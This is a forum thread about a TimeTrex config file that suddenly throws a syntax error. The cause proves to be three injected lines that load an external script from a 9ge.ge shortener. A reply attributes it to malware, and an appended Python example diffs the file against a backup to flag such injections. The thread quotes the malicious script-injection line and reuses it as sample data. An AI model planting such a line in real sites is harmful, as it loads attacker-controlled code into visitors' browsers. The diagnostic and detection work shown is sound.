
timetrex.ini.php Syntax Error Overnight

Posted: Tue May 16, 2023 1:59 am
by iain
Good Morning,

We have been running TimeTrex Community Edition for many years generally without issue, including automatic upgrades - as of approximately midnight today (known as a user attempted to log out at 00:10), TimeTrex started displaying a basic raw text error message as below:

'ERROR: Config file (/var/www/[DOMAIN REDACTED]/includes/../timetrex.ini.php) contains a syntax error! If your passwords contain special characters you need to wrap them in double quotes, ie:
password = "test!1!me"'

I examined the timetrex.ini.php file and initially could not see any issues, until I compared it to a copy taken from last night's backup - the only difference was at the very end of the file, where the following lines appear:

ob_start();
?>
<script src="https://9ge.ge/zrq0j4" type="text/javascript"></script>

This seemed a bit odd and also mildly concerning, so in a sandboxed environment I checked out the link and it appears to be a URL shortener site, but the link in particular goes to a blank file. I commented out the 3 lines from the ini.php file, and TimeTrex now loads correctly.

I've logged in and can't see any upgrades that occurred last night, so I'm a bit confused what's going on here?
The issue is fixed by commenting out those lines, however I'd like to get a root cause analysis if possible.

Kind regards,
Iain.

Re: timetrex.ini.php Syntax Error Overnight

Posted: Thu Jun 01, 2023 9:53 am
by mikeb
There isn't anything in TimeTrex itself that would add to your timetrex.ini.php file.

If I had to guess, your server may have been compromised by malware. In fact, it looks awfully like this could be the culprit, as it mentions the "9ge.ge" domain as a URL shortener:

https://blog.sucuri.net/2023/02/bogus-u ... paign.html
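
An added example, not part of the original thread and not TimeTrex code: the backup comparison described in the first post, automated so that lines added to a config file are listed and checked for an external script tag or a change of PHP context. The function names and the sample config contents are constructed for illustration; the three injected lines are the ones quoted in the post.

```python
import difflib
import re

# An external <script src=...> tag has no place in an INI-style config file.
SCRIPT_TAG = re.compile(r"<script\b[^>]*\bsrc\s*=\s*[\"']?(https?:)?//([^/\"'\s>]+)", re.I)
# A closing PHP tag or an output-buffering call changes how the rest is served.
PHP_CONTEXT = re.compile(r"\?>|\bob_start\s*\(")


def added_lines(backup: str, current: str) -> list[str]:
    """Return lines present in the current file but not in the known-good backup."""
    old, new = backup.splitlines(), current.splitlines()
    matcher = difflib.SequenceMatcher(a=old, b=new, autojunk=False)
    out = []
    for tag, _i1, _i2, j1, j2 in matcher.get_opcodes():
        if tag in ("insert", "replace"):
            out.extend(new[j1:j2])
    return out


def suspicious_lines(lines: list[str]) -> list[tuple[str, str]]:
    """Classify added lines: (kind, detail) for each line worth investigating."""
    findings = []
    for line in lines:
        match = SCRIPT_TAG.search(line)
        if match:
            findings.append(("external-script", match.group(2).lower()))
        elif PHP_CONTEXT.search(line):
            findings.append(("php-context", line.strip()))
    return findings


# Constructed sample: a minimal INI body standing in for last night's backup.
BACKUP = '[database]\ntype = postgres8\nhost = localhost\npassword = "example"\n'
# The same file with the three lines from the post appended at the end.
CURRENT = BACKUP + (
    "ob_start();\n"
    "?>\n"
    '<script src="https://9ge.ge/zrq0j4" type="text/javascript"></script>\n'
)

if __name__ == "__main__":
    for kind, detail in suspicious_lines(added_lines(BACKUP, CURRENT)):
        print(f"{kind}: {detail}")
```

Run against every file under the web root rather than the one config file, since a comparison limited to timetrex.ini.php will not show whether other files were modified at the same time.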